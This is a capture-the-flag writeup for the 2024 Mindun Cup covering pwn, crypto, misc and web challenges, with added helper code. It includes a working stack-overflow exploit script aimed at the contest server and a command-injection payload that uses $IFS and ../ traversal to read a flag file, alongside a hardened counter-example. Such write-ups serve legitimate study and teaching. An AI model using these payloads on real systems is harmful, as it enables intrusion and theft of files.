2024 闽盾杯 (Mindun Cup) WriteUp

Posted by Zephyr on Sunday, June 23, 2024

Pwn

licensePWN

Task: find a vulnerability and obtain the administrator's privileges and data.

fscanf(v1, "%s", v6);

The unbounded %s is a stack overflow; inside sub_4012F0 it gives control of eip. The intended path in the challenge is:

if ( v3 == 999 )
    sub_401340();
  return 0;

PIE is disabled, so overwrite eip with the backdoor function's address, 0x401340, and read the flag.

from pwn import *

context.log_level = "debug"
p = remote("112.50.92.5", 12523)

# Backdoor function sub_401340; no PIE, so the address is fixed.
back_addr = 0x401340

# Padding up to the saved return address, then the backdoor address (40 13 40 00).
# The original run wrote these bytes to license.txt first and read the file back;
# building the payload in memory gives the same bytes.
payload = b"aaaaaaaaaaaaaaaaaaaaaaaaaaaa" + p32(back_addr)

# The service takes the license file as a hex string
hex_payload = payload.hex()
print(hex_payload)

p.sendlineafter(b"Send me a license file(Hex string):", hex_payload.encode())
p.interactive()
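One caveat worth checking before sending: the file goes through fscanf(v1, "%s", v6), and %s stops at the first whitespace byte, so an address containing 0x20 or 0x09..0x0d could not be delivered this way (a NUL byte is not whitespace and is copied normally). The following is an added example, not the writeup's script: it builds the same padding + address payload with struct.pack instead of pwntools, refuses addresses that %s would truncate, and models what %s actually copies out of the file. The padding is the writeup's literal; the hex-string framing assumes the service decodes the hex back into the license file before parsing it.

```python
import struct

# fscanf(v1, "%s", v6) skips leading whitespace and stops at the next whitespace byte,
# so a payload that must pass through %s cannot contain any of these. A NUL byte is
# not whitespace and is copied like any other byte.
SCANF_WHITESPACE = {0x20, 0x09, 0x0A, 0x0B, 0x0C, 0x0D}

# The padding the writeup used in front of the return address (copied from its script).
PADDING_FROM_WRITEUP = b"aaaaaaaaaaaaaaaaaaaaaaaaaaaa"


def build_license_payload(pad_len: int, addr: int, width: int = 4) -> bytes:
    """Padding up to the saved return address, then addr little-endian
    (width 4 is pwntools' p32, width 8 its p64). Rejects payloads %s would truncate."""
    fmt = {4: "<I", 8: "<Q"}[width]
    payload = b"a" * pad_len + struct.pack(fmt, addr)
    bad = sorted({b for b in payload if b in SCANF_WHITESPACE})
    if bad:
        raise ValueError(f"whitespace bytes {[hex(b) for b in bad]} in payload; %s stops there")
    return payload


def to_hex_string(payload: bytes) -> str:
    """The service expects the license file as a hex string."""
    return payload.hex()


def scanf_s_reads(data: bytes) -> bytes:
    """Model of what %s copies out of the license file: skip leading whitespace,
    take bytes up to the next whitespace byte or end of file."""
    i = 0
    while i < len(data) and data[i] in SCANF_WHITESPACE:
        i += 1
    j = i
    while j < len(data) and data[j] not in SCANF_WHITESPACE:
        j += 1
    return data[i:j]


if __name__ == "__main__":
    payload = build_license_payload(len(PADDING_FROM_WRITEUP), 0x401340)
    print(to_hex_string(payload))
```

For 0x401340 the check passes (bytes 40 13 40 00); an address such as 0x401320 would be rejected because its low byte is a space, which is exactly the case where a payload like this silently stops working.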

Crypto

签到题 (Sign-in challenge)

SM3 (a hash function, not an encryption): a88a5d3b7c7721d307a29c0d959950ac921ac7da00a436c6faad3b94e16615c5

我的进制我做主 (My base, my rules)

Collect the distinct characters of the file's string ergdgjboglfpgcbpbofmgafhfngpfoflfpfkgjgccndcfqfpgcgofofpdadadagr (listed by descending frequency):

fgpdocabrjlnemhkq

That is 17 distinct letters, all within a..r. Subtract 'a' from each one.

This gives the digit table below: f, for example, is 5 in alphabetical order. Convert the original string with this table, split it into pairs, and decode each pair as a base-18 number (r = 17 is the largest digit, so the base must be at least 18).

If base 18 doesn't come to mind, brute-force the base, starting from the largest digit + 1, until the output decodes cleanly.

{'f': 5,
 'g': 6,
 'p': 15,
 'd': 3,
 'o': 14,
 'c': 2,
 'a': 0,
 'b': 1,
 'r': 17,
 'j': 9,
 'l': 11,
 'n': 13,
 'e': 4,
 'm': 12,
 'h': 7,
 'k': 10,
 'q': 16}

Then split the string into pairs:

c = "fgpdocabrjlnemhkq"   # the distinct letters (only used to build the digit table)
ci = "ergdgjboglfpgcbpbofmgafhfngpfoflfpfkgjgccndcfqfpgcgofofpdadadagr"

# Each letter's position in the alphabet is its digit value: a=0, b=1, ..., r=17
diction = {char: ord(char) - ord('a') for char in c}

# Split into pairs; each pair is one base-18 number, i.e. one ASCII character
blocks = [ci[i:i+2] for i in range(0, len(ci), 2)]

res = ''.join(
    chr(diction[high] * 18 + diction[low])
    for high, low in blocks
)

print(res)

You win! flag{heidun18jinzhi666}
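The following added example (my code, not the writeup's) generalizes the steps above: it reproduces the frequency-ordered distinct-letter string, decodes at any given base and group width, and brute-forces the base the way the writeup suggests, keeping only bases whose output is entirely printable ASCII. The ciphertext is the challenge string from the page.

```python
import string

# Challenge string from the writeup (64 lowercase letters, all within a..r)
CIPHERTEXT = "ergdgjboglfpgcbpbofmgafhfngpfoflfpfkgjgccndcfqfpgcgofofpdadadagr"


def distinct_by_frequency(text: str) -> str:
    """Distinct characters, most frequent first, ties by first appearance:
    the writeup's 'dedup' step."""
    return "".join(sorted(set(text), key=lambda ch: (-text.count(ch), text.index(ch))))


def digit_table(text: str) -> dict:
    """Each letter's alphabet index (a=0 ... r=17); the largest index fixes the minimum base."""
    return {ch: ord(ch) - ord("a") for ch in set(text)}


def decode_base(text: str, base: int, width: int = 2):
    """Read the text in fixed-width groups as base-`base` numbers, one ASCII char each.
    Returns None if a digit is out of range for the base or a value is not 7-bit ASCII."""
    table = digit_table(text)
    if max(table.values()) >= base:
        return None
    out = []
    for i in range(0, len(text), width):
        value = 0
        for ch in text[i:i + width]:
            value = value * base + table[ch]
        if value > 0x7F:
            return None
        out.append(chr(value))
    return "".join(out)


def brute_force_base(text: str, width: int = 2, max_base: int = 36) -> dict:
    """Try every base from the smallest that fits the digits up to max_base;
    keep only results that are entirely printable."""
    min_base = max(digit_table(text).values()) + 1
    hits = {}
    for base in range(min_base, max_base + 1):
        plain = decode_base(text, base, width)
        if plain is not None and all(ch in string.printable for ch in plain):
            hits[base] = plain
    return hits


if __name__ == "__main__":
    print(distinct_by_frequency(CIPHERTEXT))
    for base, plain in brute_force_base(CIPHERTEXT).items():
        print(base, plain)
```

For this string only base 18 survives: the final pair "gr" is 6*b + 17, which already exceeds 0x7F at base 19, so every higher base is rejected by the ASCII check.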

MISC

In Stegsolve, the Blue plane 0 channel (bit 0 of the blue channel) shows flag{zhss_c79a_Ccp7_4Zc9}
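Added example (not from the writeup): a dependency-free equivalent of Stegsolve's plane view. It pulls one bit of one channel out of every pixel and renders it as text; "Blue plane 0" is channel 2, bit 0. The 5x5 cover image and the hidden pattern are constructed here to show both how such a flag is planted and how it is read back; with a real PNG you would obtain the pixel rows from an image library first.

```python
def bit_plane(pixels, channel, bit):
    """One bit of one channel from every pixel, as Stegsolve's plane views show it.
    pixels: rows of (r, g, b) tuples; channel 0/1/2 = R/G/B; bit 0 = LSB.
    Stegsolve's "Blue plane 0" is bit_plane(pixels, 2, 0)."""
    return [[(px[channel] >> bit) & 1 for px in row] for row in pixels]


def render_plane(plane):
    """ASCII rendering of a plane: '#' where the bit is set, '.' where it is clear."""
    return "\n".join("".join("#" if v else "." for v in row) for row in plane)


def embed_plane(pixels, channel, bit, plane):
    """Write a 0/1 plane into the chosen bit of the chosen channel (how such a flag is hidden);
    only that one bit per pixel changes, so the visible image is unaffected."""
    out = []
    for row, prow in zip(pixels, plane):
        new_row = []
        for px, v in zip(row, prow):
            px = list(px)
            px[channel] = (px[channel] & ~(1 << bit)) | ((v & 1) << bit)
            new_row.append(tuple(px))
        out.append(new_row)
    return out


def sample():
    """Constructed data: a 5x5 colour cover and a letter 'F' hidden in blue plane 0."""
    pattern = ["#####", "#....", "####.", "#....", "#...."]
    plane = [[1 if c == "#" else 0 for c in row] for row in pattern]
    cover = [[(200, 100 + x * 10, 50 + y * 20) for x in range(5)] for y in range(5)]
    return cover, embed_plane(cover, 2, 0, plane), plane


if __name__ == "__main__":
    cover, stego, plane = sample()
    print(render_plane(bit_plane(stego, 2, 0)))
```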

学会Office (Learn Office)

Read the workbook with pandas:

import pandas as pd

# Read the Excel file (the .xls format needs the xlrd engine installed)
file_path = '学生考试成绩单.xls'  # replace with the path to your Excel file
excel_data = pd.read_excel(file_path, None)  # sheet_name=None reads every sheet into a dict

# Walk every sheet and print its contents
for sheet_name, sheet_data in excel_data.items():
    print(f"Sheet: {sheet_name}")
    print(sheet_data)

There are hidden columns.

Select all, then use Format > Unhide Columns, which reveals f1ag.

This gives the following string: iojm~qmlfklvhxdqjxdehlvlptmjlldsdggwllhmqlq€ljqmqjrqddjfnddqlvrxeloh

' Walks column I from row 3 until the first empty cell and shifts only the
' first character of each cell back by 3 (Chr(Asc(x) - 3)); the rest of the cell is kept.
Sub jiemi()
    Dim x As Long, data As String, tmp As String
    For x = 3 To 99
        data = Trim(ActiveSheet.Range("I" & x))
        If data = "" Then Exit For
        tmp = Left(data, 1)
        data = Right(data, Len(data) - 1)
        ActiveSheet.Range("I" & x) = Chr(Asc(tmp) - 3) & data
    Next x
    MsgBox "Done, please check this column!"
End Sub

After decoding, sort the rows by the 计算机 (Computer) score in descending order.
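Added example, not the writeup's code: a stdlib-only reproduction of the macro plus the final sort, run on constructed rows of (computer score, column I text) since the real sheet is not reproduced here. One detail the macro relies on: VBA's Asc/Chr work on the ANSI code page, so a '}' shifted up by 3 is byte 0x80, which displays as '€' in cp1252; that is why the column text above ends in '€'. The code encodes with cp1252 to mirror that and decodes it back to '}'.

```python
def shift_chars(text: str, shift: int = -3) -> str:
    """Shift every character by `shift` the way the macro's Chr(Asc(x) - 3) does.
    VBA's Asc/Chr use the ANSI code page, so work in cp1252: '€' is 0x80 there
    and 0x80 - 3 = 0x7D is '}'."""
    raw = text.encode("cp1252")
    return bytes((b + shift) & 0xFF for b in raw).decode("cp1252")


def decode_cell(cell: str, shift: int = -3) -> str:
    """The macro's per-cell step: shift only the first character, keep the rest."""
    if not cell:
        return cell
    return shift_chars(cell[0], shift) + cell[1:]


def recover_flag(rows, shift: int = -3) -> str:
    """rows: (computer_score, column_I_text). Decode each cell, sort by score descending,
    and read off the first character of each row: the writeup's last step."""
    ordered = sorted(rows, key=lambda r: r[0], reverse=True)
    return "".join(decode_cell(text, shift)[0] for _, text in ordered)


# Constructed stand-in for the spreadsheet rows (the real sheet and scores are not on the page).
# "\u20ac" is '€', i.e. byte 0x80 in cp1252, the same artefact seen in the real column.
SAMPLE_ROWS = [
    (90, "dxyz"), (100, "ixyz"), (55, "\u20acxyz"), (85, "jxyz"), (95, "oxyz"),
    (80, "~xyz"), (70, "hxyz"), (75, "gxyz"), (60, "rxyz"), (65, "pxyz"),
]

if __name__ == "__main__":
    print(shift_chars("iojm~"))      # first five characters of the column string, shifted
    print(recover_flag(SAMPLE_ROWS))
```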

Web

你懂fuzz吗 (Do you know how to fuzz?)

Fuzz the parameter names with arjun; it finds word. Then brute-force its value with Burp Suite.

Switch to GET and keep fuzzing with arjun; the parameter is key. Spaces are filtered, so use $IFS in place of the space: ?key=cat$IFS../../../../../flag.txt
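Added example (not from the writeup): a constructed stand-in for the endpoint that shows why the space filter falls to $IFS. The shell expands $IFS to its whitespace characters and then field-splits on them, so cat$IFS/path runs as the two words cat and /path even though the request never contained a space. Beside it is a hardened handler that allowlists the value and runs a fixed program without a shell, so neither $IFS nor ../ traversal works. The flag file, its path and the handler names are constructed; the demo needs /bin/sh.

```python
import os
import re
import subprocess
import tempfile


def space_filter(value: str) -> bool:
    """The kind of check the challenge had: only a literal space is rejected."""
    return " " not in value


def vulnerable_handler(key: str) -> str:
    """Constructed stand-in for ?key=...: passes the filter, then hands the value to sh.
    '$IFS' contains no space, so it passes; the shell expands it to whitespace and
    field-splits, so 'cat$IFS/path' runs as the two words 'cat' '/path'."""
    if not space_filter(key):
        return "blocked"
    proc = subprocess.run(["sh", "-c", key], capture_output=True, text=True)
    return proc.stdout


# Allowlist: a plain file name, no '/', no '$', no quotes; '..' cannot match either.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)?$")


def hardened_handler(key: str, base_dir: str) -> str:
    """Allowlist the value and run a fixed program without a shell: no expansion, no traversal."""
    if not _SAFE_NAME.fullmatch(key):
        return "blocked"
    path = os.path.join(base_dir, key)
    proc = subprocess.run(["cat", path], capture_output=True, text=True)
    return proc.stdout


def demo() -> dict:
    """Constructed scenario: a flag file on disk and the writeup's payload against both handlers."""
    with tempfile.TemporaryDirectory() as d:
        flag_path = os.path.join(d, "flag.txt")
        with open(flag_path, "w") as fh:
            fh.write("flag{constructed-demo}")
        payload = f"cat$IFS{flag_path}"   # the writeup's trick, absolute path instead of ../../..
        return {
            "space_blocked": vulnerable_handler(f"cat {flag_path}"),
            "ifs_bypass": vulnerable_handler(payload).strip(),
            "hardened_ifs": hardened_handler(payload, d),
            "hardened_traversal": hardened_handler("../../../../../flag.txt", d),
            "hardened_legit": hardened_handler("flag.txt", d).strip(),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The point of the hardened version is not a better blocklist (${IFS}, %09, {cat,/path} and similar all get past a space filter) but removing the shell from the path entirely and allowlisting what the parameter may contain.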